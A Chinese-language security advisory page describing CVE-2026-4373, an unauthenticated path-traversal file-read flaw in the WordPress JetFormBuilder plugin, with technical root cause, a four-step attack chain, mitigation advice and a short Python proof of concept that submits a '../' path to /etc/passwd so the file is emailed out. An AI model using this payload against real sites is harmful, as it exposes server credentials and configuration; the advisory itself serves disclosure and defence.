IPBUF安全漏洞报告
English
CVE-2026-4373 CVSS 7.5 高危

CVE-2026-4373: WordPress JetFormBuilder 任意文件读取漏洞

披露日期: 2026-03-21

漏洞信息

漏洞编号
CVE-2026-4373
漏洞类型
任意文件读取
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
WordPress JetFormBuilder 插件

相关标签

任意文件读取路径遍历WordPressJetFormBuilderCVE-2026-4373

漏洞概述

该漏洞影响WordPress的JetFormBuilder插件,版本3.5.6.2及以下。由于插件在处理文件上传时未正确验证文件路径,且同文件检查机制存在缺陷,导致未经身份验证的攻击者可以通过路径遍历读取服务器上的任意文件。攻击者利用该漏洞可窃取敏感配置文件(如wp-config.php)或其他本地数据,造成严重的信息泄露风险。

技术细节

漏洞源于`Uploaded_File::set_from_array`方法直接接受来自Media Field预设JSON payload的用户提供的文件路径,未验证该路径是否属于WordPress的上传目录。此外,`File_Tools::is_same_file`方法进行同文件检查时仅比较文件基本名称,而忽略了完整路径,导致验证失效。攻击者无需登录,只需向配置了“Media Field”和“Send Email”动作的表单提交特制的请求,即可通过路径遍历指定服务器上的任意敏感文件(如`/etc/passwd`或`wp-config.php`)。系统会将该文件作为附件发送给攻击者指定的邮箱,从而实现任意文件读取攻击。

攻击链分析

STEP 1
侦察
攻击者识别目标网站是否安装了易受攻击版本的JetFormBuilder插件(<= 3.5.6.2),并定位包含Media Field和Send Email动作的表单。
STEP 2
构造Payload
攻击者构造恶意JSON数据包,在Media Field参数中利用路径遍历序列(如../)指向服务器上的敏感文件(如wp-config.php)。
STEP 3
发送请求
攻击者无需认证,向WordPress服务器发送POST请求提交表单数据,触发文件处理逻辑。
STEP 4
文件窃取
服务器因逻辑缺陷将任意文件作为邮件附件发送,攻击者接收包含敏感文件的电子邮件。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL configuration target_url = "http://example.com/wp-admin/admin-ajax.php" # Payload exploiting path traversal via Media Field # The vulnerable parameter allows specifying a file path directly payload = { "action": "jet_form_builder_form_submit", "form_data": { "media_field": { "path": "../../../../../../etc/passwd" # Path traversal to read sensitive files } }, "form_id": "1" # Example Form ID } try: response = requests.post(target_url, json=payload) if response.status_code == 200: print("[+] Request sent successfully. Check email for the file attachment.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

影响范围

JetFormBuilder <= 3.5.6.2

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用JetFormBuilder插件中的“Media Field”功能或带有文件附件的“Send Email”通知功能。此外,可以通过Web应用防火墙(WAF)部署规则,检测并拦截包含路径遍历字符(如 '../')的恶意请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表